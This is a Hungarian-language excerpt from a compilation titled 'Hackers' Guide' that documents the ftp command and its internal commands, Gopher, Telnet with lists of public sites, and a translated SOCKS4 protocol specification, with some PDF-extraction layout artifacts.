-v Kiírja a távoli server-rol érkezo összes választ, és statisztikát készít az adatátvitelrol. Ez az alapbeállítás mikor az ftp output-ja egy consol, vagy egy monitor. Használata Az ftp protokollt arra az esetre tervezték, ha adatot szeretnénk mozgagtni két olyan gép között, melyek különbözo file-rendszert használnak. Így, bár a protokoll nagyon rugalmas az adatátvitel tekintetében, nem képes átadni a file-attributumokat. Ezenfelül az ftp protokoll feltételez néhány dolgot az file-rendszer felépítésével kapcsolatban, és nem képes, vagy nem enged olyan dolgokat csinálni, mint például rekúrzívan másolni alkönyvtárakat. Megjegyezzük, hogyha OSF/1 rendszerek között dolgozunk (vagy egyéb rendszerek között, melyek kompatibilisak a UNIX operációs rendszerrel) és szükségünk lenne a file attributumok átvitelére, vagy szükségünk lenne alkönyvtárrendszerek rekurzív másolására, akkor használjuk az rcp parancsot. Az ftp parancs rendelkezik belso parancsokkal, melyekkel például listázhatjuk a távoli könyvtárakat, mozoghatunk a helyi vagy a távoli könytárrendszerben, másolhatunk több file-t egyszerre egy parancs kiadásával, létrehozhatunk, vagy éppen törölhetünk könyvtárakat, és kiléphetünk a helyi shell-be, és kiadhatunk shell parancsokat. Az ftp ezenkívül a biztonságra is ügyel, lehetoseget ad a távoli géphez jelszó küldésére, és engedélyezi az autómatikus belépést, adatmozgatást, illetve kilépést. Ha az ftp parancsot úgy indítjuk el, hogy nem adjuk meg a távoli gép nevét, akkor az ftp> promptot adja, és vár egy parancs begépelésére. Ha egy távoli géphez szeretnénk csatlakozni, akkor az open parancsot adjuk ki. Amikor az ftp megteremti a kapcsolatot a távoli géphez kéri a bejelentkezési nevet és a jelszót, mielott visszaadná az ftp> promptot. Az ftp hibát jelez, ha nincs jelszó definiálva a távoli gépen a bejelentkezési névhez. Ha az ftp sikeresen megteremtette a kapcsolatot a távoli géppel, megkeresi a helyi $HOME/.netrc file-t az aktuális vagy a home könyvtárban. Ha megtalálta, lefuttatja a a file-ban található bejelentkezési és inicializációs processzeket, makró definíciókat beállítja. Az ftp parancsértelmezoje, amely kezeli az összes ftp> promptnál begépelt parancsot, biztosít olyan lehetoségeket is, amelyekre más file mozgató program nem képes, mint például a file nevek paraméterként kezelése, makrók készítése, betöltése a $HOME/.netrc file-ból. A parancsértelmezo a következo szabályok szerint képes a file neveket argumentumként kezelni: •
Ha a - (mínusz) jel szerepel az argumentumban, a standard inputot használja olvasásra, a standard outputot pedig az írásra.
•
Ha a file-névben az elso karakter | (függoleges vonal), akkor az argumentum fennmaradó részét úgy értelmezi, mint shell-parancsot.
121
Hackers’ Guide •
A get és az mget parancsok esetén, ha nem adjuk meg a helyi file nevet, akkor az meg fog egyezni a távol file nevével, mely módosulhat, ha a case, ntrans, nmap parancsokat használtuk elotte.
•
A put és az mput parancsok esetén, ha nincs meghatározva a távoli file neve, akkor az meg fog egyezni a helyi file nevével
Megjegyezzük, hogy az ftp parancsértelmezoje nem támogatja a csöveket. Kilépéshez a bye, quit parancsok használatosak. Ha az adatátvitelt szeretnénk megszakítani, azt a Ctrl-c-vel tehetjük meg. Az ftp parancs alapesetben a Type-of-Service értékeit használja, melyek szükségesek az RFC1060-hoz. Ezek a következoek: ftp-control •
Minimális várakozás
ftp-data •
Magas teljesítmény
Ezeket a /etc/iptos file-ban tudjuk beállítani. Parancsok Az allábbi ftp parancsokat az ftp> promptnál gépelhetjük be. Ha az argumentumban szóközök szerepelnek, akkor az argumentumot idézojelek közé kell zárni: "" ![parancs[argumentumok ...]] Meghív egy interaktív shell-t a helyi gépen. Egy opcionális parancs egy vagy több argumentummal megadható. $ macro [argumentumok ...] Meghívja a megadott makrót, amelyet elozoleg definiáltunk a macdef paranccsal. ? [parancs] Segítséget ad a megadott parancs használatáról. Ha nem adtunk meg argumentunként parancsot, akkor kilistázza az összes ftp-ben használható parancsot. account [jelszó] Küld egy kiegészíto jelszót, amelyet a távoli gép kérhet, ha hozzá szeretnénk férni az eroforrásaihoz. Ha nem adtunk meg jelszót, akkor azt promptnál kell begépelni, mely így nem jelenik meg a képernyon. append helyi_file [távoli_file] Hozzácsatolja a helyi file-t egy távoli gépen lévo file-hoz. Ha a távoli file nevét nem adtuk meg, akkor az meg fog egyezni a helyi file nevével, módosítva az ntrans, nmap által kiadott beállításokkal. ascii
122
Hackers’ Guide
Az átvitel módját ASCII típusúra állítja. Ez az alapbeállítás, ha a távoli gép nem UNIX rendszeru. Az átvitel hatékonyabb lehet, ha a bináris átviteli módot használjuk. bell Minden egyes file-muvelet végrehajtása után csippant egyet a gép. binary Az átvitel módját binárisra állítja. Ez az alapbeállítás, ha a távoli gép UNIX rendszeru. bye Megszakítja a kapcsolatot a távoli géppel, és kilép az ftp-bol. Megegyezik a quit paranccsal. case Átállítja a nagybetu kisbetu megkülönböztetést. Amikor a case be van kapcsolva, akkor ha a távoli gépen lévo file-ok neveiben nagybetu szerepel kisbeture cseréli, mikor a helyi gépre másolja a file-t. Alapbeállításként ki van kapcsolva. cd távoli_könyvtár A távoli gépen megváltoztatja a munkakönyvtárat a megadott könyvtárra. cdup A távoli gépen a munkakönyvtárat a jelenlegi szülokönyvtárára állítja. close Megszünteti a kapcsolatot a távoli géppel, de nem lép ki az ftp-bol. A definiált makrókat törli. Megegyezik a disconnect paranccsal. cr Levágja a kocsi-vissza karaktert a kocsi-vissza/soremelés sorozatból, mikor ASCII módban másolunk file-okat. Ez a UNIX és OSF/1 alapú rendszerek miatt szükséges, mivel ott a recordok végét csak a soremelés karakter jelzi. A cr parancs ezt a lehetoséget ki/be kapcsolja. delete távoli_file Törli a megadott távoli file-t. debug [on | off] Kiír minden parancsot, melyet a távoli gépnek küld, a --> jel után, ha a debug on parancsot adtuk ki. dir [távoli_könyvtár][helyi_file] A távoli könyvtár tartalmát a megadott helyi file-ba írja ki. Ha távoli könyvtárnevet nem adtunk meg, akkor az aktuális munkakönyvtárat listázza ki, illetve ha nem adtuk meg a helyi file nevét, akkor a helyi terminálra ír ki. disconnect Lásd close utasítás. form formátum
123
Hackers’ Guide
Meghatározza az átvitel formátumát. Az egyetlen lehetséges a non-print formátum. get távoli_file [helyi_file] A távoli file-t a helyi gépre másolja. Ha a helyi file neve nincs megadva, akkor az meg fog egyezni a távoli file nevével, módosítva a case, ntrans, nmap parancsok beállításaival. hash Mikor a hash be van kapcsolva, az ftp minden egyes átmozgatott adatblokk után (1024byte) egy # jelet tesz. help [parancs] Lásd ? parancsot. lcd [könyvtárnév] Megváltoztatja a munkakönyvtárat a helyi gépen. Ha nem adtunk meg könyvtárnevet, akkor a home-könyvtárunkat állítja be munkakönyvtárnak. ls [távoli_könyvtár] [helyi_file] Lásd a dir parancsot. macdef makró Makró definiálása. A rákövetkezo sorok az üres sorig (két egymásutáni soremelés karakter) a makró szövegeként lesz elmentve. Összesen 16 makrót definiálhatunk, melyek legfeljebb 4096byte hosszúak lehetnek. A makrók addig érvényesek, míg újra nem definiáljuk oket, vagy ki nem adunk egy close parancsot. A speciális karaktereknek ($ (dollár jel) és a \ (backslash jel)) speciális jelentésük van. A $ jel utáni szám(ok) a makró argumentumait jelölik. A \ jelet akkor használjuk, ha speciális jelet szeretnénk használni, annak speciális jelentése nélkül. mdelete távoli_file-ok Távoli file-ok törlése. mdir [távoli_könyvtár ... helyi_file] A távoli könyvtár tartalmát a helyi file-ba írja. Ha a távoli könyvtár nevébe joker-karaktereket adtunk meg, akkor szükséges a helyi file megadása. Ha a távoli könyvtár argumentum könyvtárak listája, szóközökkel elválasztva, az utolsó argumentumnak a helyi file-nak kell lennie, vagy a - (mínusz) karakternek. mget távoli_file ... A távoli file(okat) a helyi munkakönyvtárba másolja, módosítva azok neveit a case, ntrans, nmap beállításainak megfeleloen. A másolást a type, form, mode, structure beállításainak megfeleloen végzi. mkdir [távoli_könyvtár] Létrehoz egy könyvtárat a távoli gépen, az argumentumban megadott névvel. mls [távoli_könyvtár ... helyi_file]
124
Hackers’ Guide
A távoli könyvter tartalmát rövidített formában kilistázza a helyi file-ba. Ha a távoli könyvtár nevében joker-karakterek szerepelnek, illetve ha több távoli köyvtárat is megadtunk, szükséges a helyi file megadása. mode [mód] Az átvitel módját állítja be. Az egyetlen lehetséges mód a stream mód. modtime [távoli_file] Megmutatja a távoli file utolsó módosításának idejét. mput [helyi_file ...] A helyi file-t a távoli gépre másolja. A fileneveket az ntrans, nmap parancsoknak megfeleloen módosítja. Az adatátvitel a type, form, mode beállításainak megfeleloen történik. nlist [távoli könyvtár] [helyi_file] Kilistázza a távoli könyvtár tartalmát. Ha ezt argumentumban nem adtuk meg, akkor a munkakönyvtárat listázza ki. Ha nincs helyi file megadva, akkor a monitorra listáz. nmap [bemeneti_minta kimeneti_minta] Beállítja vagy kikapcsolja a file-nevek módosítását. Ha nem adunk meg argumentumot, akkor kikapcsolja. Ha adtunk meg argumentumot, akkor az mget, mput utasítások használatakor és a get utasítás esetén ha nem adtunk meg cél file-nevet, akkor a forrás file nevét a beállításoknak megfeleloen módosítja. A bemeneti mintában megadott változók a forrás file alapján veszik fel értéküket. Ezek a változók: $1 ... $9. Például ha a bemeno minta mydata.dat, akkor $1 értéke mydata, míg $2 értéke dat lesz. A kimeneti minta változói határozzák meg a cél file nevét. Itt a $0 az eredeti file nevet jelenti. Például a következo parancs a myfile.data néven el a myfile.data vagy myfile.data.old nevu file-okat, illetve myfile.file néven a myfile file-t, illetve myfile.myfile néven a .myfile file-t: nmap $1.$2.$3 [$1,$2].[$2,file] ntrans [bemneti_karakterek [kimeneti_karakterek]] Beállítja vagy kikapcsolja a file nevekben történo karaktercseréket. Ha nem adtunk meg argumentumot, akkor kikapcsolja a cserét. Ha adtunk meg argumentumot, akkor az mget, mput, get, put parancsok esetén a cél file neve a beállításoknak megfeleloen módosul. Ha a file nevében szereplo karakter megegyezik a bemeneti karakterekkel, akkor azt az ftp kicseréli a kimeneti karakterekre. open host [port] Kapcsolatot létesít a host-on található FTP szerverrel. Ha a port számát megadtuk, akkor a kapcsolat azon a porton keresztül veszi fel. Ha az automatikus bejelentkezést beállítottuk (a -n kapcsolóval), akkor az ftp automatikusan bejelentkezik az adott szerverre. prompt
125
Hackers’ Guide
Ki/bekapcsolja az interaktív promptot. Ha ez be van kapcsolva (ez az alapállapot), akkor az ftp visszakérdez, ha több file-t mozgatunk egyszerre, máskülönben végrehajtja az utasítást kérdés nélkül. proxy [parancs] Végrehajtja a parancsot ehu másodlagos kapcsolaton. A proxy segítségével mozgathatunk file-okat két távoli server között. Használata elott egy távoli serverre már be kell jelentkeznünk az open paranccsal. A következo parancsok másként muködnek proxy használatával: •
az open parancs nem definiálja az új makrókat.
•
a close parancs nem törli a már definiált makrókat.
•
get, mget, put, mput, append parancsok az elsodleges és a másodlagos kapcsolat között mozgatják a file-okat.
put helyi_file [távoli_file] Átmásolja a helyi file-t a távoli gépre. Ha nem adjuk meg a távoli file argumentumot, akkor annak neve meg fog egyezni a helyijével, módosítva az ntrans, nmap által beállítotakkal. Az átvitel módját a form, mode, type, structurebeállításainak megfeleloen történik. quit Lásd bye parancsot. quote szöveg Elküldi a szöveget szó szerint a távoli gépnek. recv távoli_file [helyi_file] Lásd get parancs. reget távoli_file [heyli_file] Ugyanúgy muködik, mint a get parancs kivéve, ha a helyi file már létezik, és kisebb méretu, mint a távoli file, akkor megpróbálja a helyi file-hoz hozzáfuzni a hiányzó részt. Ez akkor lehet hasznos, ha az adatátvitel megszakadt, és azt folytatni szeretnénk. remotehelp [parancs] Segítség kérése a távoli FTP servertol. rename mit mire File átnevezése a távoli gépen. reset Törli a válaszvonalat, újraszinkronizálja a kapcsolatot. rmdir távoli_könyvtár Törli a távoli gépen a megadott könyvtárat. runique Be/kikapcsolja a file-név módosítást, ha a get, mget paranccsal olyan file-t szeretnénk athozni, mellyel azonos nevu már létezik a munkakönyvtárban. Ha kikapcsoljuk (ez az alapállapot), akkor ilyen esetekben felülírja a helyi file-t. Ha
126
Hackers’ Guide
bekapcsoljuk, az ftp azonos file-nevek esetén a cél file nevét kiegészíti.1 , .2 ,.... jelekkel. send helyi_file [távoli_file] Lásd get parancs. sendport Ki/bekapcsolja az FTP PORT utasítások használatát. Alapállapotan ez be van kapcsolva. size távoli_file Megadja a távoli file méretét byte-okban. status Kiírja az ftp jelenlegi státuszát. struct [szerkezet] Beálltja az átvitel szerkezetét. Az egyetlen szerkezettipus a file tipus. sunique Ha a put, mput utasítással olyan file-t másolunk a távoli szerverre, melynek nevén már létezik ott file, akkor a sunique kiadása után a file nevet módosítja az ftp, míg alapállapotban felülírja azt. system Megmutatja milyen operációs rendszer fut a távoli gépen. tenex Az adatátvitel tipusát olyanra átállítja, mely megfelel a TENEX tipusú gépeknek. trace Be/kikapcsolja a csomagok nyomkövetését. type [tipus] Az adatátvitel tipusát állítja be. Ha argumentum nélkül adjuk ki, kiírja a jelenlegi tipust. user [jelszó] [account] Azonosítja a helyi felhasználót a távoli gép számára. Ha a jelszót vagy az account-ot nem adtuk meg, és szükség van rá, akkor az ftp megkérdezi azt. Ha az autómatikus bejelentkezés be van kapcsolva, akkor ez autómatikusan megtörtének. verbose Ki-bekapcsolja a verbose módot. Ez alapállapotban be van kapcsolva, ekkor az ftp kiírja a távoli szerver válaszait, illetve statisztikát készít az adatátvitelrol. Példák $ ftp ural2.hszk.bme.hu Connected to ural2.hszk.bme.hu 220 host2 FTP server (Version SunOS 5.6 on 14:40:27) ready. 127
Hackers’ Guide
Name (ural2.hszk.bme.hu:nagy): na218 331 Password required for na218 Password: 230 User na218 logged in. Remote system type is UNIX. Using binary mode to transfer files. ftp> pwd 257 "/home/a/stu/na218" is current directory. ftp> ls 200 PORT command successful. 150 ASCII data connection for /bin/ls (152.66.83.28,1680) (0 bytes). total 4904 drwx--x--x 4 na218 students 512 Dec 15 17:06 . drwxr-xr-x 1100 root root 17920 Sep 15 14:17 .. -rw-r--r-- 1 na218 students 0 Dec 4 15:06 .addressbook -rw-r--r-- 1 na218 students 2285 Dec 4 15:06 .addressbook.lu -rw-r--r-- 1 na218 students 939 Dec 19 10:04 .bash_history -rw------- 1 na218 students 0 Dec 4 15:09 .mc.hot -rw-r--r-- 1 na218 students 0 Dec 4 15:09 .mc.ini 226 ASCII Transfer complete. ftp> get .mc.hot testfile.tmp local: testfile.tmp remote: .mc.hot 200 PORT command successful. 150 Binary data connection for .mc.hot (152.66.83.28,1709) (0 bytes). 226 Binary Transfer complete. ftp> quit 221 Goodbye. $ $ ftp test Connected to test.abc.org 220 test FTP server (Version ...) ready. Name (test:fred): msith 530 User msith unknown ftp> user smith 331 Passwd required for smith Password: 230 User smith logged in ftp> $ ftp ftp> open host1 Connected to host1.abc.org 220 host1 FTP server (Version ...) ready. Name (host1:fred): 331 Passwd required for fred Password: 230 User fred logged in ftp> Thanx: Nagy Attila
128
Hackers’ Guide
************************************************************************************************
GOPHER Az Internet oly nagy, és a tárolt informáciú mennyiség oly mértékben nõ, hogy az adatrengetegben valú eligazodáshoz állandúan újabb és újabb felderítõ, rendszerezõ eszköz fejlesztése szükséges. Az egyik legsokoldalúbb ilyen navigációs program a Gopher. Alapkoncepciója szerint minden Gopher párbeszéd egy menü felkínálásával kezdõdik, amelynek valamelyik sorát kiválasztva ujabb almenüket (azok valamelyik sorát kiválasztva esetleg ujabb almenüket), majd a fa legalsó szintjén fájlokat vagy szolgáltatásokat lehet kiválasztani. A menüknek ez a hierarchikus mélyítése tetszõlegesen folytatható. Attól függõen, hogy milyen számítógéprendszert használunk a Gopher elérésére, elõfordulhat, hogy nem tudunk minden információt megjeleníteni vagy hasznosítani. Például a speciális grafikus képek megjelenítése, vagy az audio fájlok lejátszása csak megfelelõ számítógépes környezetben lehetséges. A Gopher szervereknek két fõ tipusa van: az Egyetemi Informáciús Rendszer (Campus Wide Information System, azaz CWIS), és a nagyközönség számára szolgáló információs szerver. A CWIS-ek általában a diákok, az egyetemi kar vagy szervezet tagjai érdeklõdésének megfelelõ információkat tartalmazzák, az olyan közérdekû tudnivalók mellett, mint például az egyetemi események, tanfolyami információk, gyakran más Gopherekre vonatkozú utalásokat is biztosítanak, amelyek között a nagyközönséget kiszolgáló információs szerver, vagy más campus közösségek különleges információkat is szolgáltathat, mint például a Wisconsini Egyetem (Parkside) dalszöveg szervere, idõjárás-elõrejelzés, ill. archivált levelezési listák és hírcsoportok. A GOPHER MÛKÖDÉSE: A Gopher az un. kliens-szerver arcitectúrán alapul, tehát van Gopher kliens- és Gopher szerverprogram. A Gopher szerverprogram azokon a gazdaszámítógépeken fut, amelyek az informáciút szolgáltatják, a Gopher kliensprogram pedig a Gopher szerveren tárolt informáciúk elérésére szolgál. A kliensprogram fogadja a felhasználú billentyû leütéseit, megjeleníti a menüket, fogadja és megjeleníti a dokumentumokat és minden olyan egyéb mûveletet elvégez, amihez a szerver nem szükséges. A szerverprogram várja a kliensek menü- és dokumentumigényeit, és a kérések teljesítése után "nyugalmi állapotba" tér vissza. Ennek az elrendezésnek az az egyetlen hátránya, hogy néha bizonyos dokumentumok vagy menük csak hosszú idõ után jelennek meg a képernyõn. Ennek az az oka, hogy a Gopher világában kalandozva, valószínûleg számos különbözõ szerverrel kapcsolatba kerülünk, annak ellenére, hogy végig ugyanazt a kliensprogramot használjuk. Elõfordulhat, hogy ezek a szerverek nagyon 129
Hackers’ Guide
népszerûek, vagy lassú hálózati kapcsolattal rendelkeznek, vagy egyszerûen meghibásodtak és azért nem mûködnek. A Gopher kliens programot elindítva máris megkezdhetjük barangolásunkat a Gopher-térben. A Gopher kezelése roppant egyszerû, egérrel ill. kurzorral tudunk mozogni a menükben, és Enter-el tudunk választani a minket érdeklô témák közül. Amennyiben a Netscape Navigatort használjuk, akkor ugyanúgy dolgozhatunk mint a http vagy ftp protokollok alatt. A Gopher alapbeállításánál érdemes a minessotai gopherhez csatlakozni, ahonnan a világ bermely Gopherszerveréhez könnyedén eljuthatunk. Ha ezeken a helyeken nem találunk semmi érdekeset, akkor egy olyan menüpontot kell keresnünk amely más Gopher szerverek felé mutat elágazást. (pl. All the gopher servers in the world, stb.) Itt aztán kedvünkre válogathatunk A Gopher szó angolul egyébként hörcsögöt jelent... GOPHER SZERVEREK gopher://ora.com (könyvek) gopher://ftp.spies.com (könyvek) gopher://chronicle.merit.edu (újságok) gopher://gopher.netsys.com:2100 (újságok) gopher://krakatoa.jsc.nasa.gov (NASA) gopher://naic.nasa.gov (NASA) gopher://technology.com (NASA) gopher://gopher.iif.hu (Magyar gopher szerver)
************************************************************************************************
MI A TELNET A Telnet lényege, hogy a saját számitógépedről be tudsz jelentkezni egy másik(mindegy, hogy a világ melyik részén lévő) számitógépre. Az FTP-vel és aGopher-rel ilyet már csináltál, de akkor csak az ott lévő adatokat érted el.Telnet esetében programokat is futtathatsz a távoli (remote) gépen. MIRE JÓ A klasszikus (és legkevésbé gyakori) felhasználás, hogy ha például kűlföldön vagy, bármelyik gépről be tudsz jelentkezni az Internet szolgáltatód gépére,és el tudod olvasni a leveleidet, leveleket tudsz irni stb, anélkűl, hogy nemzetközi telefonhávást végeznél, és abból addóan, hogy egy programot tudsz a távoli gépen futtatni, a lehetőségek határtalanok. Van telnet site, ami adatbázisokhoz ad hozzáférést, kereshetsz benne, rendezheted, bővitheted. Van, ahol egy élő beszélgetésbe kapcsolódhatsz be. 130
Hackers’ Guide
Többszereplős, világméretű játékokat játszhatsz, ujságokatolvashatsz, szavak helyesirását ellenőrizheted, szinonimákat kérhetsz hozzájuk, és mivel vannak nálam kreativabb emberek is, amit akarsz, azt megtalálod. TELNET CIMEK Akárcsak a levelezősnél, vagy az FTP-nél, itt is nevekkel (vagy számukkal) hivatkozhatsz a gépekre. Ebből adodoan a Telnet cimek valahogy ugy néznek ki: fedworld.gov fedix.fie.com geophys.washington.edu A legtöbb Internet cim enged Telnet elérést, viszont általában szükséged van egy usernévre és egy jelszora. Ha az adott cégnél van userneved, akkorcélszerű azt használnod, hiszen a regisztrált felhasználoknak mindig több joguk van, mint a "vendégeknek". Ha nincs userneved, rendszertől függően használhatod a GUEST, vagy VISITOR loginnevet. Van szerver, ahol bizonyos szolgáltatásokat csak a megfelelő login névvel érhetsz el. Például lehet, hogy ha ugyanarra a szerverre GAMES-ként jelentkezel be, akkor teljesen mást látsz, mintha BUSINESS-ként. A publikus szerverek bejelentkezés elött általában kiirják, hogy milyen usernévvel mit érhetsz el. Erre mindjárt nézünk egy példát, ha majd a Telnet session pontos menetét nézzük meg. "PORT" SZÁM Találkozhatsz olyan Telnet cimekkel is, amiknek a végén egy szám található, például: seabass.st.usm.edu 23 cybernet.cse.fau.edu 2010 A cimek utáni szám egy "port" szám. Ennek semmi köze a számitógépek fizikai portjához. A port számok egy-egy programot jelentenek. Ha port számot is megadsz egy telnet session indátásakor, akkor bejelentkezés után egyből az adott program indul el. A szokásos port szám a 23. (Standard login.) TELNET SESSION Az első lépés, hogy elinditasz egy Telnet programot. Ezután meg kell adnod, hogy milyen cimre szeretnél bejelentkezni. (Egyes programoknak ezt már inditáskor is megadhatod a parancssorban.) Ezt, programtólfüggően az OPEN <sitec?m> <portsz?m> vagy a TELNET <sitec?m> <portsz?m> paranccsal, esetleg egy menüből kiválasztva teheted meg. A különböz? Telnet programok eddig térhettek el, a Telnet session többi része azonos lesz. Miután sikeresen rákapcsolodtál a távoli gépre, információt kapsz arról, és egy ilyen sorral is találkozol: 131
Hackers’ Guide
Escape character is ... A ... helyén lévő karatketkombináciával szakithatod meg a telnet session-t, ekkor telnet parancsmódba lépsz. A parancsmódrol mindjárt beszélünk. Ezt az escape character-t jegyezd meg, mindjárt szükséged lesz rá. A következő lépés, hogy bejelentkezz. Általában meg kell adnod a userneved és a jelszavad. Ha egy publikus elérésű rendszerre kapcsolodtál rá, akkor ez a lépés kimarad. Gyakori még az a megoldás is, hogy usernévként egy adott szolgáltatósnevét kell beirnod, ilyenkor nem kér a gép jelszót. Hogy milyen szolgáltatások vannak az adott gépen, azt vagy neked kell valahonnan tudnod,vagy belépés elött elolvashatod. Hogy belépés után hol mit találsz, azt nem tudjuk leirni, mert mindegyik rendszer más. TELNET PARANCSOK A távoli számitógéppel való kapcsolatfelvétel legegyszerűbb módja, ha a telnet kliens programot, paraméterként az elérni szándokozott távoli gép teljes Internet nevével vagy cimével megivjuk. Az IP cim ismerete hasznos lehet hibás névszerver esetén. Saját hálózaton belűl a teljes név helyett elegendő csak a gép neve is. Ha a kapcsolat létrejött, akkor a továbbiakban ugyanigy dolgozhatunk, mintha annak egyik terminálja mellett űlnénk, azaz mindazokat az utasitásokat használhatjuk, amelyeket az adott gépen lokálisan is kiadhatnánk. A kapcsolni kivánt gép megadásához megvalositástól függően vagy prompt-ot kapunk, vagy OPEN paranccsal nyithatjuk és CLOSE paranccsal zárhatjuk le a távoli géppel a kapcsolatot. Ha az utobbi megoldást használjuk, akkor a CLOSE után még a telnet programban vagyunk és ebből a QUIT utasitással léphetünk ki. CLOSE - lezárja a jelenlegi kapcsolatot DISPLAY - megnyitja az operácios paramétereket MODE - megprobál line-to-line vagy character-a-time modba lépni OPEN - egy oldalhoz csatlakozik QUIT - kilépés a telnetből SEND - különleges karaktereket közöl SET - beállitja a kölönleges paramétereket STATUS - kiadja az alapinformáciokat Z - félbeszakitja a telnetet ? vagy HELP - kiirja a telnet súgót. TELNET HELYEK sunserv.sztaki.hu gopher.iif.hu (login:gopher,password:gopher)
132
Hackers’ Guide
hollis.harvard.edu spacelink.msfc.nasa.gov metro.jussieu.fr10000 info.cnri.reston.va.us185 access.usask.ca (login:hytelnet) liberty.uc.wlu.edu70 open.dra.com info.ccit.arizona.edu gopher.liberty.uc.win.edu70 (login:hytelnet) base.carl.org database.carl.org india.colorado.edu13 spl.lib.wa.us (login:library) (select:1forVT100) stinfo.hq.eso.org sunsite.unc.edu quake.think.com (login:wais) info.cnri.reston.va.us185 bruno.cs.colorado.edu ds.internic.net mudhoney.micro.umn.edu netfind.oc.com (login:netfind) redmont.cis.uab.edu (login:netfind) debra.dgbt.doc.ca3000 teetot.acusd.edu cfa204.harvard.edu vax.mtak.hu
************************************************************************************************
Socks4 Protokoll Fordítás, kiegészítéssel, eredeti címe, szerzoje: "SOCKS: A protocol for TCP proxy across firewalls" /Ying-Da Lee, Principal Member Technical Staff, NEC Systems Laboratory, CSTC/ Néhány fogalmat tisztázzunk, mielott elolvassuk a protokoll-leírást: a kliens az a számítógép, amely csatlakozni akar az alkalmazásszerverhez. Pl. ha line-208110.dial.matav.net csatlakozni akar irc.elte.hu -hoz, akkor line-208110.dial.matav.net a kliens, és az irc.elte.hu az alkalmazásszerver. A SOCKS szerver pedig az a számítógép, amelyiken a SOCKS szolgáltatás fut, és közvetít a kliens és az alkalmazásszerver között. A SOCKS-ot eredetileg David Koblas fejlesztette ki és folyamatosan módosult és bovült a mai változatig - a 4.-esig. Ez egy protokoll, amely TCP kapcsolatokat 133
Hackers’ Guide
közvetít egy tuzfal-számítógépen, hogy a felhasználók számára átlátszó hozzáférést biztosítson más gépekhez. A protokoll független a különféle alkalmazások protokolljaitól, ezért sok különbözo szolgáltatásra használható (és használatos is), mint pl. telnet, ftp, finger, whois, gopher, www, stb. A hozzáférés biztosítása minden TCP kapcsolat elején történik; utána a szerver már egyszeruen csak közvetíti az adatokat a kliens és az alkalmazás-szerver között, minimális feldolgozással. A SOCKS-nak nem kell tudnia semmit az alkalmazás protokolljáról, ezért könnyen megvalósítható olyan alkalmazás, amely titkosítást használ az adatforgalom biztosítására. Két muvelet definiált: a CONNECT és a BIND. 1) CONNECT A kliens, amikor csatlakozni akar az alkalmazás-szerverrel, csatlakozik a SOCKS szerverhez és CONNECT-kérést küld. A kliens a kérésben elküldi a célgép IP-címét és a portszámát, valamint a felhasználói azonosítóját, a következo formátumban. +----+----+----+----+----+----+----+----+----+----+....+----+ DSTPORT | DSTIP | USERID |NULL| --+----+----+----+----+....+----+ bájtok száma 1 1 2 1
| VN | CD | +----+----+----+----+----+-4 variable
ahol: VN a SOCKS protokoll verziószáma, és 4-nek kell lennie. CD a SOCKS parancskód és 1-nek kell lennie a CONNECT-kéréshez. NULL pedig egy 8 db 0-bitbol álló bájt. DSTPORT a célgép portja, amelyikre csatlakozni akarunk. 2 bájt, a és b, DSTPORT = a*256+b. DSTIP a célgép IP címe. USERID a felhasználói azonosító. A SOCKS szerver megnézi, hogy a kérés teljesítheto-e, mégpedig a forrásgép IP címébol, a célgép IP-címébol és portjából, a felhasználói azonosítóból és abból az információból, amelyet az IDENT útján nyer (RFC1413). Ha a kérés teljesítheto, a SOCKS szerver kapcsolatot létesít a megadott porttal a célgépen. Egy válaszcsomagot küld a kliensnek, amikor a kapcsolat létrejött, vagy ha kérést elutasította, vagy ha a kapcsolat nem hozható létre. Ez a válaszcsomag így néz ki: +----+----+----+----+----+----+----+----+ | VN | CD | DSTPORT | DSTIP | +----+----+----+----+----+----+----+----+ bájtok száma: 2 4 ahol: VN a válaszkód verziószáma és 0-nak kell lennie. CD az eredmény kódja, és valamelyiknek kell lennie a következok közül: 90: a kérés elfogadva (request granted) 91: a kérés elutasítva vagy nem sikerült (request rejected or failed) 92: a kérés elutasítva, mert a SOCKS szerver nem tudott a kliens identportjára csatlakozni 93: a kérés elutasítva, mert a kliensprogram és az identd más felhasználói azonosítót mutatnak
134
1
1
Hackers’ Guide
A többi mezot figyelmen kívül kell hagyni. A SOCKS szerver azonnal lezárja a kapcsolatot, ha a kapcsolatot nem sikerült létrehozni, vagy a kérés el lett utasítva. Ha a kérést elfogadta, a SOCKS szerver felkészül az adatok mindkét irányba történo forgalmazására. Ez lehetové teszi a kliensnek, hogy írjon/olvasson az adatcsatornán, mintha közvetlenül az alkalmazásszerverrel lenne összeköttetésben. 2) BIND Amikor a kliens kapcsolatot akar fogadni az alkalmazásszerverrel, csatlakozik a SOCKS szerverhez és egy BIND kérést küld. Ez csak akkor történhet, ha elotte már az alkalmazásszerverrel létrejött egy kapcsolat a CONNECT-kéréssel (elsodleges kapcsolat). A BIND tulajdonképpen muveletek sorozata: -bind(): egy socket létrehozása -getsockname(): a socket IP címének és portszámának megállapítása -listen(): kész vagyunk az alkalmazásszerver által kezdeményezett kapcsolat fogadására -az elsodleges kapcsolaton informáljuk az alkalmazásszervert, hogy milyen IP-címen és portszámon kell kapcsolódnia -accept(): elfogadjuk az alkalmazásszerver által kezdeményezett kapcsolatot. A SOCKS BIND célja, hogy egy ilyen muveletsort végrehajtson, de a SOCKS szerveren hozzuk létre a socketet, és nem a kliensen. A kliens a kérésben az alkalmazásszerver IP-címét, az elsodleges kapcsolat portszámát és a felhasználói azonosítóját küldi el. +----+----+----+----+----+----+----+----+----+----+....+----+ DSTPORT | DSTIP | USERID |NULL| --+----+----+----+----+....+----+ bájtok száma: 1 1 2 1
| VN | CD | +----+----+----+----+----+-4 variable
ahol: VN a SOCKS protokoll verziószáma, és 4. CD jelzi, hogy BIND kérésrol van szó, és 2-nek kell lennie. A SOCKS szerver a klienstol érkezo információkat használja arra, hogy eldöntse, teljesítheto-e a kérés. Egy válaszcsomagot küld vissza a kliensnek, ugyanolyan formában, mint a CONNECT-kérésnél: +----+----+----+----+----+----+----+----+ | VN | CD | DSTPORT | DSTIP | +----+----+----+----+----+----+----+----+ bájtok száma: 2 4
1
1
ahol: VN a válaszkód verziószáma és 0-nak kell lennie. CD az eredmény kódja és valamelyiknek az alábbiak közül kell lennie: 90: a kérés elfogadva (request granted) 91: a kérés elutasítva vagy nem sikerült (request rejected or failed) 92: a kérés elutasítva, mert a SOCKS szerver nem tudott a kliens identportjára csatlakozni
135
Hackers’ Guide
